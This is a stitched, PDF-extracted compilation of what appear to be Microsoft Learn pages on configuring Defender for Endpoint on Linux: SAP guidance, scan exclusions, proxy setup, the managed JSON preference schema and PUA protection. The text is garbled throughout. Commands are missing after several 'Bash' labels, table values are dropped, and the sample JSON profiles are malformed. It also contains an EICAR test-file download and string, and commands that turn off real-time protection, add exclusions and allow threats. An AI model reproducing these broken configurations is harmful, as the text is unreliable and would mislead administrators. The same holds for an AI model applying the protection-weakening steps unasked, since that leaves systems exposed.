Suse 12.x, Redhat 7.x and Oracle Linux 7.x are technically supported but weren't
extensively tested.
Suse 11.x, Redhat 6.x and Oracle Linux 6.x might not be supported and weren't
tested.
Suse and Redhat offer tailored distributions for SAP. These "for SAP" versions of
Suse and Redhat might have different packages preinstalled and possibly different
kernels.
SAP only supports certain Linux File systems. In general, XFS and EXT3 are used.
Oracle Automatic Storage Management (ASM) filesystem is sometimes used for
Oracle DBMS and can't be read by Defender for Endpoint.
Some SAP applications use "standalone engines" such as TREX, Adobe Document
Server, Content Server and LiveCache. These engines require specific configuration
and file exclusions.
SAP applications often have Transport and Interface directories with many
thousands of small files. If the number of files is larger than 100,000, it might and
affect performance. It's recommended to archive files.
It's strongly recommended to deploy Defender for Endpoint to nonproductive SAP
landscapes for several weeks before deploying to production. The SAP Basis Team
should use tools such as sysstat, KSAR, and nmon to verify if CPU and other
performance parameters are impacted.
Prerequisites for deploying Microsoft Defender

for Endpoint on Linux on SAP VMs
Microsoft Defender for Endpoint version >= 101.23082.0009 | Release version:
30.123082.0009 or higher must be deployed.
Microsoft Defender for Endpoint on Linux supports all the Linux releases used by
SAP applications.
Microsoft Defender for Endpoint on Linux requires connectivity to specific Internet
endpoints from VMs to update antivirus Definitions.
Microsoft Defender for Endpoint on Linux requires some crontab (or other task
scheduler) entries to schedule scans, log rotation, and Microsoft Defender for
Endpoint updates. Enterprise Security teams normally manage these entries. Refer
to How to schedule an update of the Microsoft Defender for Endpoint (Linux) |
Microsoft Learn.
The default configuration option for deployment as an Azure Extension for AntiVirus
(AV) will be Passive Mode. This means that the AV component of Microsoft Defender for
Endpoint won't intercept IO calls. It's recommended to run Microsoft Defender for
Endpoint in Passive Mode on all SAP applications and to schedule a scan once per day.
In this mode:
Real-time protection is turned off: Threats aren't remediated by Microsoft

Defender Antivirus.
On-demand scanning is turned on: Still use the scan capabilities on the endpoint.
Automatic threat remediation is turned off: No files are moved and the security
administrator is expected to take required action.
Security intelligence updates are turned on: Alerts are available on security
administrator's tenant.
The Linux crontab is typically used to schedule Microsoft Defender for Endpoint AV scan
and log rotation tasks: How to schedule scans with Microsoft Defender for Endpoint
(Linux) | Microsoft Learn
Endpoint Detection and Response (EDR) functionality is active whenever Microsoft

Defender for Endpoint on Linux is installed. There's no simple way to disable EDR
functionality through command line or configuration. For more information on
troubleshooting EDR, see the sections Useful Commands and Useful Links.
Important Configuration Settings for Microsoft

Defender for Endpoint on SAP on Linux
It's recommended to check the installation and configuration of Defender for Endpoint
with the command mdatp health.
The key parameters recommended for SAP applications are:
healthy = true
release_ring = Production. Prerelease and insider rings shouldn't be used with SAP
Applications.
real_time_protection_enabled = false. Real-time protection is off in passive mode,
which is the default mode and prevents real-time IO interception.
automatic_definition_update_enabled = true
definition_status = "up_to_date". Run a manual update if a new value is identified.
edr_early_preview_enabled = "disabled". If enabled on SAP systems it might lead
to system instability.
conflicting_applications = [ ]. Other AV or security software installed on a VM such
as Clam.
supplementary_events_subsystem = "ebpf". Don't proceed if ebpf isn't displayed.
Contact the security admin team.
This article has some useful hints on troubleshooting installation issues for Microsoft
Defender for Endpoint: Troubleshoot installation issues for Microsoft Defender for
Endpoint on Linux
Recommended Microsoft Defender for

Endpoint Antivirus Exclusions for SAP on Linux
Enterprise Security Team must obtain a full list of antivirus exclusions from the SAP
Administrators (typically the SAP Basis Team). It's recommended to initially exclude:
DBMS data files, log files and temp files, including disks containing backup files
The entire contents of the SAPMNT directory
The entire contents of the SAPLOC directory
The entire contents of the TRANS directory
The entire contents of directories for standalone engines such as TREX
Hana – exclude /hana/shared, /hana/data, and /hana/log - see Note 1730930
SQL Server – Configure antivirus software to work with SQL Server - SQL Server |
Microsoft Learn
Oracle – See How To Configure Anti-Virus On Oracle Database Server (Doc ID
782354.1)
DB2 – https://www.ibm.com/support/pages/which-db2-directories-exclude-linux-
anti-virus-software
SAP ASE – contact SAP
MaxDB – contact SAP
Oracle ASM systems don't need exclusions as Microsoft Defender for Endpoint can't
read ASM disks.
Customers with Pacemaker clusters should also configure these exclusions:
Bash
mdatp exclusion folder add --path /usr/lib/pacemaker/ (for RedHat

/var/lib/pacemaker/)
Bash
mdatp exclusion process add --name pacemakerd

Bash
mdatp exclusion process add --name crm_*
Customers running the Azure Security security policy might trigger a scan using the
Freeware Clam AV solution. It's recommended to disable Clam AV scan after a VM has
been protected with Microsoft Defender for Endpoint using following commands:
Bash
sudo azsecd config -s clamav -d "Disabled"
Bash
sudo service azsecd restart
Bash
sudo azsecd status
The following articles detail how to configure AV exclusions for processes, files, and
folders per individual VM:
Set up exclusions for Microsoft Defender Antivirus scans | Microsoft Learn

Common mistakes to avoid when defining exclusions | Microsoft Learn
Scheduling a Daily AV Scan

The recommended configuration for SAP applications disables real-time interception of
IO calls for AV scanning. The recommended setting is passive mode in which
real_time_protection_enabled = false.
The following link details how to schedule a scan: How to schedule scans with Microsoft
Defender for Endpoint (Linux) | Microsoft Learn.
Large SAP systems might have more than 20 SAP application servers each with a
connection to the SAPMNT NFS share. Twenty or more application servers
simultaneously scanning the same NFS server will likely overload the NFS server. By
default, Defender for Endpoint on Linux doesn't scan NFS sources.
If there's a requirement to scan SAPMNT then this scan should be configured on one or
two VMs only.
Scheduled scans for SAP ECC, BW, CRM, SCM, Solution Manager, and other components
should be staggered at different times to avoid all SAP components from overloading a
shared NFS storage source shared by all SAP components.
Useful Commands
If, during manual zypper installation on Suse an error "Nothing provides
'policycoreutils'" occurs, refer to: Troubleshoot installation issues for Microsoft Defender
for Endpoint on Linux.
There are several command-line commands that can control the operation of mdatp. To
enable passive mode, you can use the following command:
Bash
mdatp config passive-mode --value enabled
７ Note
passive mode is the default mode on installing defender for endpoint on Linux.
To turn off real-time protection, you can use the command:
Bash
mdatp config real-time-protection --value disabled
This command tells mdatp to retrieve the latest definitions from the cloud:
Bash
mdatp definitions update
This command tests whether mdatp can connect to the cloud-based endpoints via the
network:
Bash
These commands update the mdatp software, if needed:

Bash
yum update mdatp
Bash
zypper update mdatp
Since mdatp runs as a linux system service, you can control mdatp using the service
command, for example:
Bash
service mdatp status
This command creates a diagnostic file that can be uploaded to Microsoft support:
Bash
Useful Links
Microsoft Endpoint Manager doesn't support Linux at this time
Manage Microsoft Defender for Endpoint configuration settings on devices with
Microsoft Endpoint Manager | Microsoft Learn
Microsoft Defender for Endpoint Linux - Configuration and Operation Command
List - Microsoft Tech Community
Deploying Microsoft Defender for Endpoint on Linux Servers. - Microsoft Tech
Community
Linux | Microsoft Docs
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux |
Microsoft Docs
Feedback
Configure and validate exclusions for
Linux
Article • 02/21/2024
Applies to:

This article provides information on how to define exclusions that apply to on-demand
scans, and real-time protection and monitoring.
） Important
The exclusions described in this article don't apply to other Defender for Endpoint
on Linux capabilities, including endpoint detection and response (EDR). Files that
you exclude using the methods described in this article can still trigger EDR alerts
and other detections. For EDR exclusions, contact support.
You can exclude certain files, folders, processes, and process-opened files from Defender
for Endpoint on Linux scans.
Exclusions can be useful to avoid incorrect detections on files or software that are
unique or customized to your organization. They can also be useful for mitigating
performance issues caused by Defender for Endpoint on Linux.
２ Warning
Defining exclusions lowers the protection offered by Defender for Endpoint on

Linux. You should always evaluate the risks that are associated with implementing
exclusions, and you should only exclude files that you are confident are not
malicious.
Linux.
ﾉ Expand table
File All files with the extension, anywhere on the device .test
extension

/var/log/*.log

/var/*/
name) and all files opened by it cat
c?t
） Important
The paths above must be hard links, not symbolic links, in order to be successfully
excluded. You can check if a path is a symbolic link by running file <path-name> .
ﾉ Expand table
Wildcard Description Examples
* Matches any number of any characters /var/*/tmp includes any file in

including none (note if this wildcard is /var/abc/tmp and its subdirectories, and
not used at the end of the path then it /var/def/tmp and its subdirectories. It does
will substitute only one folder) not include /var/abc/log or /var/def/log
/var/*/ includes any file in /var and its

subdirectories.
? Matches any single character file?.log includes file1.log and

file2.log , but not file123.log
７ Note
When using the * wildcard at the end of the path, it will match all files and
subdirectories under the parent of the wildcard.
How to configure the list of exclusions
From the management console

For more information on how to configure exclusions from Puppet, Ansible, or another
management console, see Set preferences for Defender for Endpoint on Linux.
From the command line

Run the following command to see the available switches for managing exclusions:
Bash
mdatp exclusion
 Tip
When configuring exclusions with wildcards, enclose the parameter in double-

quotes to prevent globbing.
Examples:
Add an exclusion for a file extension:
Bash
mdatp exclusion extension add --name .txt
Console
Extension exclusion configured successfully
Add an exclusion for a file:

Bash
mdatp exclusion file add --path /var/log/dummy.log
Console
File exclusion configured successfully
Add an exclusion for a folder:
Bash
mdatp exclusion folder add --path /var/log/
Console
Folder exclusion configured successfully
Add an exclusion for a second folder:
Bash
mdatp exclusion folder add --path /var/log/

mdatp exclusion folder add --path /other/folder
Console
Add an exclusion for a folder with a wildcard in it:
Bash
mdatp exclusion folder add --path "/var/*/tmp"
７ Note
This will only exclude paths below /var/*/tmp/, but not folders which are
siblings of tmp; for example, /var/this-subfolder/tmp, but not /var/this-
subfolder/log.
Bash
mdatp exclusion folder add --path "/var/"
OR
Bash
mdatp exclusion folder add --path "/var/*/"
７ Note
This will exclude all paths whose parent is /var/; for example, /var/this-
subfolder/and-this-subfolder-as-well.
Console
Add an exclusion for a process:
Bash
mdatp exclusion process add --name cat
Console
Process exclusion configured successfully
Add an exclusion for a second process:
Bash
mdatp exclusion process add --name cat

mdatp exclusion process add --name dog
Console
Process exclusion configured successfully

You can validate that your exclusion lists are working by using curl to download a test
file.
In the following Bash snippet, replace test.txt with a file that conforms to your
exclusion rules. For example, if you have excluded the .testing extension, replace
test.txt with test.testing . If you are testing a path, ensure that you run the command
within that path.
Bash
curl -o test.txt https://secure.eicar.org/eicar.com.txt
If Defender for Endpoint on Linux reports malware, then the rule is not working. If there
is no report of malware, and the downloaded file exists, then the exclusion is working.
You can open the file to confirm that the contents are the same as what is described on
the EICAR test file website .
If you do not have Internet access, you can create your own EICAR test file. Write the
EICAR string to a new text file with the following Bash command:
Bash
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'
> test.txt
You can also copy the string into a blank text file and attempt to save it with the file
name or in the folder you are attempting to exclude.
Allow threats
In addition to excluding certain content from being scanned, you can also configure the
product not to detect some classes of threats (identified by the threat name). You
should exercise caution when using this functionality, as it can leave your device
unprotected.
To add a threat name to the allowed list, execute the following command:
Bash
mdatp threat allowed add --name [threat-name]

The threat name associated with a detection on your device can be obtained using the
following command:
Bash
mdatp threat list
For example, to add EICAR-Test-File (not a virus) (the threat name associated with
the EICAR detection) to the allowed list, execute the following command:
Bash
mdatp threat allowed add --name "EICAR-Test-File (not a virus)"
 Tip
Feedback

Endpoint on Linux for static proxy
discovery
Article • 07/18/2023
Applies to:

Microsoft Defender for Endpoint can discover a proxy server using the HTTPS_PROXY
environment variable. This setting must be configured both at installation time and after
the product has been installed.
Installation time configuration

During installation, the HTTPS_PROXY environment variable must be passed to the
package manager. The package manager can read this variable in any of the following
ways:
The HTTPS_PROXY variable is defined in /etc/environment with the following line:
Bash
HTTPS_PROXY="http://proxy.server:port/"
The HTTPS_PROXY variable is defined in the package manager global configuration.

For example, in Ubuntu 18.04, you can add the following line to
/etc/apt/apt.conf.d/proxy.conf :
Bash
Acquire::https::Proxy "http://proxy.server:port/";
Ｕ Caution
Note that above two methods could define the proxy to use for other
applications on your system. Use this method with caution, or only if this is
meant to be a generally global configuration.
The HTTPS_PROXY variable is prepended to the installation or uninstallation

commands. For example, with the APT package manager, prepend the variable as
follows when installing Microsoft Defender for Endpoint:
Bash
HTTPS_PROXY="http://proxy.server:port/" apt install mdatp
７ Note
Do not add sudo between the environment variable definition and apt,
otherwise the variable will not be propagated.
The HTTPS_PROXY environment variable may similarly be defined during uninstallation.
Note that installation and uninstallation will not necessarily fail if a proxy is required but
not configured. However, telemetry will not be submitted, and the operation could take
much longer due to network timeouts.
Post installation configuration

After installation, configure Defender for Endpoint with static proxy using the following
method:
Bash
mdatp config proxy set --value http://address:port
７ Note
This method works for every distribution of Defender for Endpoint on Linux and is
Recommended.
The HTTPS_PROXY environment variable must be defined in the Defender for Endpoint
service file. To do this, run sudo systemctl edit --full mdatp.service . You can then
propagate the variable to the service in one of two ways:
1. Uncomment the line #Environment="HTTPS_PROXY=http://address:port" and specify
your static proxy address.
2. Add a line EnvironmentFile=/path/to/env/file . This path can point to

/etc/environment or a custom file, either of which needs to add the following line:
Bash
HTTPS_PROXY="http://proxy.server:port/"
After modifying mdatp.service , save the file and restart the service so the changes can
be applied using the following commands:
Bash
sudo systemctl daemon-reload; sudo systemctl restart mdatp
７ Note
To remove any additions you might have made before uninstalling mdatp , delete
the custom file from /etc/systemd/system .
７ Note
Red Hat Enterprise Linux 6.X and CentOS 6.X don't support systemctl and
/etc/environment methods. To configure static proxy for MDE on these
distributions, use the Recommended mdatp config proxy set method.
 Tip
Feedback

Set preferences for Microsoft Defender
for Endpoint on Linux
Article • 02/14/2024
Applies to:

） Important
This topic contains instructions for how to set preferences for Defender for
Endpoint on Linux in enterprise environments. If you are interested in configuring
the product on a device from the command-line, see Resources.
In enterprise environments, Defender for Endpoint on Linux can be managed through a

configuration profile. This profile is deployed from the management tool of your choice.
Preferences managed by the enterprise take precedence over the ones set locally on the
device. In other words, users in your enterprise aren't able to change preferences that
are set through this configuration profile. If exclusions were added through the
managed configuration profile, they can only be removed through the managed
configuration profile. The command line works for exclusions that were added locally.
This article describes the structure of this profile (including a recommended profile that
you can use to get started) and instructions on how to deploy the profile.
Configuration profile structure

The configuration profile is a .json file that consists of entries identified by a key (which
denotes the name of the preference), followed by a value, which depends on the nature
of the preference. Values can be simple, such as a numerical value, or complex, such as a
nested list of preferences.
Typically, you would use a configuration management tool to push a file with the name
mdatp_managed.json at the location /etc/opt/microsoft/mdatp/managed/ .
The top level of the configuration profile includes product-wide preferences and entries
for subareas of the product, which are explained in more detail in the next sections.
Antivirus engine preferences

The antivirusEngine section of the configuration profile is used to manage the
preferences of the antivirus component of the product.
ﾉ Expand table
Description Value
Key antivirusEngine
Enforcement level for antivirus engine

Specifies the enforcement preference of antivirus engine. There are three values for
setting enforcement level:
Real-time ( real_time ): Real-time protection (scan files as they're modified) is

enabled.
On-demand ( on_demand ): Files are scanned only on demand. In this:
Passive (passive): Runs the antivirus engine in passive mode. In this:
Real-time protection is turned off: Threats are not remediated by Microsoft
Defender Antivirus.
On-demand scanning is turned on: Still use the scan capabilities on the
endpoint.
Automatic threat remediation is turned off: No files will be moved and security
admin is expected to take required action.
Security intelligence updates are turned on: Alerts will be available on security
admins tenant.
ﾉ Expand table
Description Value
Description Value
Data type String
Possible real_time
values on_demand
passive (default)
Comments Available in Defender for Endpoint version 101.10.72 or higher. Default is

changed from real_time to passive for Endpoint version 101.23062.0001 or higher.
Enable/disable behavior-monitoring
Determines whether behavior monitoring and blocking capability is enabled on the
device or not.
７ Note
This feature is applicable only when Real-Time Protection feature is enabled.
ﾉ Expand table
Description Value
Key behaviorMonitoring
Data type String
Possible values disabled (default)

enabled
Run a scan after definitions are updated
Specifies whether to start a process scan after new security intelligence updates are
downloaded on the device. Enabling this setting triggers an antivirus scan on the
running processes of the device.
ﾉ Expand table
Description Value
Key scanAfterDefinitionUpdate
Description
Data type Value
Boolean

false
Scan archives (on-demand antivirus scans only)
Specifies whether to scan archives during on-demand antivirus scans.
７ Note
Archive files are never scanned during real time protection. When the files in an
archive are extracted, they are scanned. The scanArchives option can be used to
force the scan of archives only during on-demand scan.
ﾉ Expand table
Description Value
Key scanArchives
Data type Boolean

false
Degree of parallelism for on-demand scans
Specifies the degree of parallelism for on-demand scans. This corresponds to the
number of threads used to perform the scan and impacts the CPU usage, and the
duration of the on-demand scan.
ﾉ Expand table
Description Value
Key maximumOnDemandScanThreads
Data type Integer

Description Value
Possible values 2 (default). Allowed values are integers between 1 and 64.
Exclusion merge policy

Specifies the merge policy for exclusions. It can be a combination of administrator-
defined and user-defined exclusions ( merge ) or only administrator-defined exclusions
( admin_only ). This setting can be used to restrict local users from defining their own
exclusions.
ﾉ Expand table
Description Value
Key exclusionsMergePolicy
Data type String

admin_only
Scan exclusions
Entities that have been excluded from the scan. Exclusions can be specified by full paths,
extensions, or file names. (Exclusions are specified as an array of items, administrator can
specify as many elements as necessary, in any order.)
ﾉ Expand table
Description Value
Key exclusions
Type of exclusion
Specifies the type of content excluded from the scan.

ﾉ Expand table
Description Value
Key $type
Data type String
Possible values excludedPath

excludedFileName
Path to excluded content
Used to exclude content from the scan by full file path.
ﾉ Expand table
Description Value
Key path
Data type String
Possible values valid paths
Path type (file / directory)
Indicates if the path property refers to a file or directory.
ﾉ Expand table
Description Value
Key isDirectory
Data type Boolean

true
File extension excluded from the scan

Used to exclude content from the scan by file extension.
ﾉ Expand table
Description Value
Key extension
Data type String
Possible values valid file extensions
Comments Applicable only if $type is excludedFileExtension
Process excluded from the scan*
Specifies a process for which all file activity is excluded from scanning. The process can
be specified either by its name (for example, cat ) or full path (for example, /bin/cat ).
ﾉ Expand table
Description Value
Key name
Data type String
Comments Applicable only if $type is excludedFileName
Muting Non Exec mounts

Specifies the behavior of RTP on mount point marked as noexec. There are two values
for setting are:
Unmuted ( unmute ): The default value, all mount points are scanned as part of RTP.
Muted ( mute ): Mount points marked as noexec aren't scanned as part of RTP, these
mount point can be created for:
Database files on Database servers for keeping data base files.
File server can keep data files mountpoints with noexec option.
Back up can keep data files mountpoints with noexec option.
ﾉ Expand table
Description Value
Key nonExecMountPolicy
Data type String
Possible values unmute (default)

mute
Unmonitor Filesystems
Configure filesystems to be unmonitored/excluded from Real Time Protection(RTP). The
filesystems configured are validated against Microsoft Defender's list of permitted
filesystems. Only post successful validation, will the filesystem be allowed to be
unmonitored. These configured unmonitored filesystems will still be scanned by Quick,
Full, and custom scans.
ﾉ Expand table
Description Value
Key unmonitoredFilesystems
Comments Configured filesystem will be unmonitored only if it is present in Microsoft's list of

permitted unmonitored filesystems.
By default, NFS and Fuse are unmonitored from RTP, Quick, and Full scans. However,
they can still be scanned by a custom scan. For example, to remove NFS from the list of
unmonitored filesystems list, update the managed config file as shown below. This will
automatically add NFS to the list of monitored filesystems for RTP.
JSON
{
"antivirusEngine":{
"unmonitoredFilesystems": ["Fuse"]
}
}
To remove both NFS and Fuse from unmonitored list of filesystems, do the following
JSON
{
"antivirusEngine":{
"unmonitoredFilesystems": []
}
}
７ Note
Below is the default list of monitored filesystems for RTP -
[btrfs, ecryptfs, ext2, ext3, ext4, fuseblk, jfs, overlay, ramfs, reiserfs, tmpfs, vfat,
xfs]
If any monitored filesystem needs to be added to the list of unmonitored

filesystems,then it needs to be evaluated and enabled by Microsoft via cloud
config. Following which customers can update managed_mdatp.json to unmonitor
that filesystem.
Configure file hash computation feature

Enables or disables file hash computation feature. When this feature is enabled,
Defender for Endpoint computes hashes for files it scans. Note that enabling this feature
might impact device performance. For more details, please refer to: Create indicators for
files.
ﾉ Expand table
Description Value
Key enableFileHashComputation
Data type Boolean

true
Allowed threats
List of threats (identified by their name) that aren't blocked by the product and are
instead allowed to run.
ﾉ Expand table
Description Value
Key allowedThreats
Disallowed threat actions

Restricts the actions that the local user of a device can take when threats are detected.
The actions included in this list aren't displayed in the user interface.
ﾉ Expand table
Description Value
Key disallowedThreatActions
Possible values allow (restricts users from allowing threats)

restore (restricts users from restoring threats from the quarantine)
Threat type settings

The threatTypeSettings preference in the antivirus engine is used to control how certain
threat types are handled by the product.
ﾉ Expand table
Description Value
Key threatTypeSettings
Threat type
Type of threat for which the behavior is configured.

ﾉ Expand table
Description Value
Key key
Data type String
Possible values potentially_unwanted_application

archive_bomb
Action to take
Action to take when coming across a threat of the type specified in the preceding
section. Can be:
Audit: The device isn't protected against this type of threat, but an entry about the
threat is logged.
Block: The device is protected against this type of threat and you're notified in the
security console.
Off: The device isn't protected against this type of threat and nothing is logged.
ﾉ Expand table
Description Value
Key value
Data type String
Possible values audit (default)

block
off
Threat type settings merge policy
Specifies the merge policy for threat type settings. This can be a combination of
administrator-defined and user-defined settings ( merge ) or only administrator-defined
settings ( admin_only ). This setting can be used to restrict local users from defining their
own settings for different threat types.
ﾉ Expand table
Description Value
Key threatTypeSettingsMergePolicy
Data type String

admin_only
Antivirus scan history retention (in days)

Specify the number of days that results are retained in the scan history on the device.
Old scan results are removed from the history. Old quarantined files that are also
removed from the disk.
ﾉ Expand table
Description Value
Key scanResultsRetentionDays
Data type String
Possible values 90 (default). Allowed values are from 1 day to 180 days.
Maximum number of items in the antivirus scan history

Specify the maximum number of entries to keep in the scan history. Entries include all
on-demand scans performed in the past and all antivirus detections.
ﾉ Expand table
Description Value
Key scanHistoryMaximumItems
Data type String
Possible values 10000 (default). Allowed values are from 5000 items to 15000 items.

Advanced scan options
The following settings can be configured to enable certain advanced scanning features.
７ Note
Enabling these features might impact device performance. As such, it is

recommended to keep the defaults.
Configure scanning of file modify permissions events
When this feature is enabled, Defender for Endpoint will scan files when their
permissions have been changed to set the execute bit(s).
７ Note
This feature is applicable only when the enableFilePermissionEvents feature is

enabled. For more information, see Advanced optional features section below for
details.
ﾉ Expand table
Description Value
Key scanFileModifyPermissions
Data type Boolean

true
Configure scanning of file modify ownership events
When this feature is enabled, Defender for Endpoint will scan files for which ownership
has changed.
７ Note
This feature is applicable only when the enableFileOwnershipEvents feature is

enabled. For more information, see Advanced optional features section below for
details.
ﾉ Expand table
Description Value
Key scanFileModifyOwnership
Data type Boolean

true
Configure scanning of raw socket events
When this feature is enabled, Defender for Endpoint will scan network socket events
such as creation of raw sockets / packet sockets, or setting socket option.
７ Note
This feature is applicable only when Behavior Monitoring is enabled.
７ Note
This feature is applicable only when the enableRawSocketEvent feature is enabled.

For more information, see Advanced optional features section below for details.
ﾉ Expand table
Description Value
Key scanNetworkSocketEvent
Data type Boolean

true
Cloud-delivered protection preferences

The cloudService entry in the configuration profile is used to configure the cloud-driven
protection feature of the product.
７ Note
Cloud-delivered protection is applicable with any Enforcement level settings

(real_time, on_demand, passive).
ﾉ Expand table
Description Value
Key cloudService
Enable / disable cloud delivered protection
Determines whether cloud-delivered protection is enabled on the device or not. To

improve the security of your services, we recommend keeping this feature turned on.
ﾉ Expand table
Description Value
Key enabled
Data type Boolean

false
Diagnostic collection level

Diagnostic data is used to keep Defender for Endpoint secure and up to date, detect,
diagnose and fix problems, and also make product improvements. This setting
determines the level of diagnostics sent by the product to Microsoft.
ﾉ Expand table
Description Value
Key diagnosticLevel
Data type String
Possible values optional

required (default)
Configure cloud block level

This setting determines how aggressive Defender for Endpoint is in blocking and
scanning suspicious files. If this setting is on, Defender for Endpoint is more aggressive
when identifying suspicious files to block and scan; otherwise, it is less aggressive and
therefore blocks and scans with less frequency.
There are five values for setting cloud block level:
Normal ( normal ): The default blocking level.

Moderate ( moderate ): Delivers verdict only for high confidence detections.
High ( high ): Aggressively blocks unknown files while optimizing for performance
(greater chance of blocking non-harmful files).
High Plus ( high_plus ): Aggressively blocks unknown files and applies additional
protection measures (might impact client device performance).
Zero Tolerance ( zero_tolerance ): Blocks all unknown programs.
ﾉ Expand table
Description Value
Key cloudBlockLevel
Data type String
Possible values normal (default)

moderate
high
high_plus
zero_tolerance

Enable / disable automatic sample submissions
Determines whether suspicious samples (that are likely to contain threats) are sent to
Microsoft. There are three levels for controlling sample submission:
None: no suspicious samples are submitted to Microsoft.

Safe: only suspicious samples that don't contain personally identifiable information
(PII) are submitted automatically. This is the default value for this setting.
All: all suspicious samples are submitted to Microsoft.
ﾉ Expand table
Description Value
Key automaticSampleSubmissionConsent
Data type String
Possible values none

safe (default)
all
Enable / disable automatic security intelligence updates

Determines whether security intelligence updates are installed automatically:
ﾉ Expand table
Description Value
Key automaticDefinitionUpdateEnabled
Data type Boolean

false
Advanced optional features

The following settings can be configured to enable certain advanced features.
７ Note
Enabling these features might impact device performance. It is recommended to
keep the defaults.
ﾉ Expand table
Description Value
Key features
Module load feature

Determines whether module load events (file open events on shared libraries) are
monitored.
７ Note
ﾉ Expand table
Description Value
Key moduleLoad
Data type String

enabled
Supplementary sensor configurations
The following settings can be used to configure certain advanced supplementary sensor
features.
ﾉ Expand table
Description Value
Key supplementarySensorConfigurations
Configure monitoring of file modify permissions events
Determines whether file modify permissions events ( chmod ) are monitored.
７ Note
When this feature is enabled, Defender for Endpoint will monitor changes to the
execute bits of files, but not scan these events. For more information, see Advanced
scanning features section for more details.
ﾉ Expand table
Description Value
Key enableFilePermissionEvents
Data type String

enabled
Configure monitoring of file modify ownership events
Determines whether file modify ownership events (chown) are monitored.
７ Note
When this feature is enabled, Defender for Endpoint will monitor changes to the
ownership of files, but not scan these events. For more information, see Advanced
scanning features section for more details.
ﾉ Expand table
Description Value
Key enableFileOwnershipEvents
Data type String

enabled
Configure monitoring of raw socket events
Determines whether network socket events involving creation of raw sockets / packet
sockets, or setting socket option, are monitored.
７ Note
７ Note
When this feature is enabled, Defender for Endpoint will monitor these network
socket events, but not scan these events. For more information, see Advanced
scanning features section above for more details.
ﾉ Expand table
Description Value
Key enableRawSocketEvent
Data type String

enabled
Configure monitoring of boot loader events
Determines whether boot loader events are monitored and scanned.

７ Note
ﾉ Expand table
Description Value
Key enableBootLoaderCalls
Data type String

enabled
Configure monitoring of ptrace events
Determines whether ptrace events are monitored and scanned.
７ Note
ﾉ Expand table
Description Value
Key enableProcessCalls
Data type String

enabled
Configure monitoring of pseudofs events
Determines whether pseudofs events are monitored and scanned.
７ Note
ﾉ Expand table
Description Value
Key enablePseudofsCalls
Data type String

enabled
Configure monitoring of module load events using eBPF
Determines whether module load events are monitored using eBPF and scanned.
７ Note
ﾉ Expand table
Description Value
Key enableEbpfModuleLoadEvents
Data type String

enabled
Report AV Suspicious Events to EDR
Determines whether suspicious events from Antivirus are reported to EDR.
ﾉ Expand table
Description Value
Key sendLowfiEvents
Description Value
Data type String

enabled
Network protection configurations

The following settings can be used to configure advanced Network Protection
inspection features to control what traffic gets inspected by Network Protection.
７ Note
For these to be effective, Network Protection has to be turned on. For more
information, see Turn on network protection for Linux.
ﾉ Expand table
Description Value
Key networkProtection
Configure ICMP inspection
Determines whether ICMP events are monitored and scanned.
７ Note
ﾉ Expand table
Description Value
Key disableIcmpInspection
Data type Boolean

Description Value

false
Recommended configuration profile

To get started, we recommend the following configuration profile for your enterprise to
take advantage of all protection features that Defender for Endpoint provides.
The following configuration profile will:
Enable real-time protection (RTP)

Specify how the following threat types are handled:
Potentially unwanted applications (PUA) are blocked
Archive bombs (file with a high compression rate) are audited to the product
logs
Enable automatic security intelligence updates
Enable automatic sample submission at safe level
Sample profile
JSON
{
"antivirusEngine":{
{
"value":"block"
},
{
"value":"audit"
}
]
},
"cloudService":{
"automaticDefinitionUpdateEnabled":true,
"enabled":true,
}
}
Full configuration profile example

The following configuration profile contains entries for all settings described in this
document and can be used for more advanced scenarios where you want more control
over the product.
７ Note
It is not possible to control all Microsoft Defender for Endpoint communication

with only a proxy setting in this JSON.
Full profile
JSON
{
"antivirusEngine":{
"behaviorMonitoring": "enabled",
"scanHistoryMaximumItems": 10000,
"scanResultsRetentionDays": 90,
"exclusions":[
{
"path":"/var/log/system.log<EXAMPLE DO NOT USE>"
},
{
"isDirectory":true,
"path":"/run<EXAMPLE DO NOT USE>"
},
{
"isDirectory":true,
"path":"/home/*/git<EXAMPLE DO NOT USE>"
},
{
"extension":".pdf<EXAMPLE DO NOT USE>"
},
{
"name":"cat<EXAMPLE DO NOT USE>"
}
],
"allowedThreats":[
"<EXAMPLE DO NOT USE>EICAR-Test-File (not a virus)"
],
"allow",
"restore"
],
"nonExecMountPolicy":"unmute",
"unmonitoredFilesystems": ["nfs,fuse"],
{
"value":"block"
},
{
"value":"audit"
}
]
},
"cloudService":{
"enabled":true,
"automaticDefinitionUpdateEnabled":true,
}
}
Add tag or group ID to the configuration

profile
When you run the mdatp health command for the first time, the value for the tag and
group ID will be blank. To add tag or group ID to the mdatp_managed.json file, follow the
below steps:
1. Open the configuration profile from the path

/etc/opt/microsoft/mdatp/managed/mdatp_managed.json .
2. Go down to the bottom of the file, where the cloudService block is located.
3. Add the required tag or group ID as following example at the end of the closing
curly bracket for the cloudService .
JSON
},
"cloudService": {
"enabled": true,
"diagnosticLevel": "optional",
"automaticSampleSubmissionConsent": "safe",
"automaticDefinitionUpdateEnabled": true,
"proxy": "http://proxy.server:port/"
},
"edr": {
"groupIds":"GroupIdExample",
"tags": [
{
"key": "GROUP",
"value": "Tag"
}
]
}
}
７ Note
Add the comma after the closing curly bracket at the end of the cloudService
block. Also, make sure that there are two closing curly brackets after adding Tag or
Group ID block (please see the above example). At the moment, the only supported
key name for tags is GROUP .
Feedback

applications with Microsoft Defender
Article • 11/15/2023
Applies to:

The potentially unwanted application (PUA) protection feature in Defender for Endpoint
on Linux can detect and block PUA files on endpoints in your network.
These applications are not considered viruses, malware, or other types of threats, but
might perform actions on endpoints that adversely affect their performance or use. PUA
can also refer to applications that are considered to have poor reputation.
These applications can increase the risk of your network being infected with malware,
cause malware infections to be harder to identify, and can waste IT resources in cleaning
up the applications.
How it works
Defender for Endpoint on Linux can detect and report PUA files. When configured in
blocking mode, PUA files are moved to the quarantine.
When a PUA is detected on an endpoint, Defender for Endpoint on Linux keeps a record
of the infection in the threat history. The history can be visualized from the Microsoft
Defender portal or through the mdatp command-line tool. The threat name will contain
the word "Application".
Configure PUA protection

PUA protection in Defender for Endpoint on Linux can be configured in one of the
following ways:
Off: PUA protection is disabled.
Audit: PUA files are reported in the product logs, but not in Microsoft Defender
XDR. No record of the infection is stored in the threat history and no action is
taken by the product.
Block: PUA files are reported in the product logs and in Microsoft Defender XDR. A
record of the infection is stored in the threat history and action is taken by the
product.
２ Warning
By default, PUA protection is configured in Audit mode.
